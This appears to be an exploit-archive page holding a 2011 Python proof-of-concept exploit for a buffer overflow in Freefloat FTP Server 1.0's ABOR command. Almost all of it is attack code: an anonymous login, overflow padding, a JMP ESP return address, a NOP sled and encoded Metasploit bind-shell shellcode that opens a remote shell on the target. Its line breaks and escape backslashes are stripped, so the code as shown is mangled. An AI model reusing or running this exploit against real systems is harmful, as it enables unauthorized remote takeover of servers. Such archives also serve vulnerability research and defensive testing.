Home / exploits Freefloat FTP 1.0 ABOR Buffer Overflow
Posted on 19 July 2011
#!/usr/bin/python #Title: Freefloat FTP 1.0 ABOR Exploit #Author: Craig Freyman (@cd1zz) #Date: July 18, 2011 #Tested on Windows XP SP3 import socket,sys,time,struct if len(sys.argv) < 2: print "[-]Usage: %s <target addr> " % sys.argv[0] sys.exit(0) target = sys.argv[1] if len(sys.argv) > 2: platform = sys.argv[2] #./msfpayload windows/shell_bind_tcp r | ./msfencode -e x86/shikata_ga_nai -b "x00xffx0dx0ax3dx20" #[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1) shellcode = ("xbfx5cx2ax11xb3xd9xe5xd9x74x24xf4x5dx33xc9" "xb1x56x83xc5x04x31x7dx0fx03x7dx53xc8xe4x4f" "x83x85x07xb0x53xf6x8ex55x62x24xf4x1exd6xf8" "x7ex72xdax73xd2x67x69xf1xfbx88xdaxbcxddxa7" "xdbx70xe2x64x1fx12x9ex76x73xf4x9fxb8x86xf5" "xd8xa5x68xa7xb1xa2xdax58xb5xf7xe6x59x19x7c" "x56x22x1cx43x22x98x1fx94x9ax97x68x0cx91xf0" "x48x2dx76xe3xb5x64xf3xd0x4ex77xd5x28xaex49" "x19xe6x91x65x94xf6xd6x42x46x8dx2cxb1xfbx96" "xf6xcbx27x12xebx6cxacx84xcfx8dx61x52x9bx82" "xcex10xc3x86xd1xf5x7fxb2x5axf8xafx32x18xdf" "x6bx1exfbx7ex2dxfaxaax7fx2dxa2x13xdax25x41" "x40x5cx64x0exa5x53x97xcexa1xe4xe4xfcx6ex5f" "x63x4dxe7x79x74xb2xd2x3exeax4dxdcx3ex22x8a" "x88x6ex5cx3bxb0xe4x9cxc4x65xaaxccx6axd5x0b" "xbdxcax85xe3xd7xc4xfax14xd8x0ex8dx12x16x6a" "xdexf4x5bx8cxf1x58xd5x6ax9bx70xb3x25x33xb3" "xe0xfdxa4xccxc2x51x7dx5bx5axbcxb9x64x5bxea" "xeaxc9xf3x7dx78x02xc0x9cx7fx0fx60xd6xb8xd8" "xfax86x0bx78xfax82xfbx19x69x49xfbx54x92xc6" "xacx31x64x1fx38xacxdfx89x5ex2dxb9xf2xdaxea" "x7axfcxe3x7fxc6xdaxf3xb9xc7x66xa7x15x9ex30" "x11xd0x48xf3xcbx8ax27x5dx9bx4bx04x5exddx53" "x41x28x01xe5x3cx6dx3excaxa8x79x47x36x49x85" "x92xf2x79xccxbex53x12x89x2bxe6x7fx2ax86x25" "x86xa9x22xd6x7dxb1x47xd3x3ax75xb4xa9x53x10" "xbax1ex53x31") #7C874413 FFE4 JMP ESP kernel32.dll ret = struct.pack('<L', 0x7C874413) padding = "x90" * 150 crash = "x41" * 246 + ret + padding + shellcode print "\n[*] Freefloat FTP 1.0 ABOR Exploit \n[*] Author: Craig Freyman (@cd1zz) \n[*] Connecting to "+target s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) try: s.connect((target,21)) except: print "[-] Connection to "+target+" failed!" sys.exit(0) print "[*] Sending " + `len(crash)` + " byte crash..." s.send("USER anonymous ") s.recv(1024) s.send("PASS ") s.recv(1024) s.send("ABOR " + crash + " ") time.sleep(4)
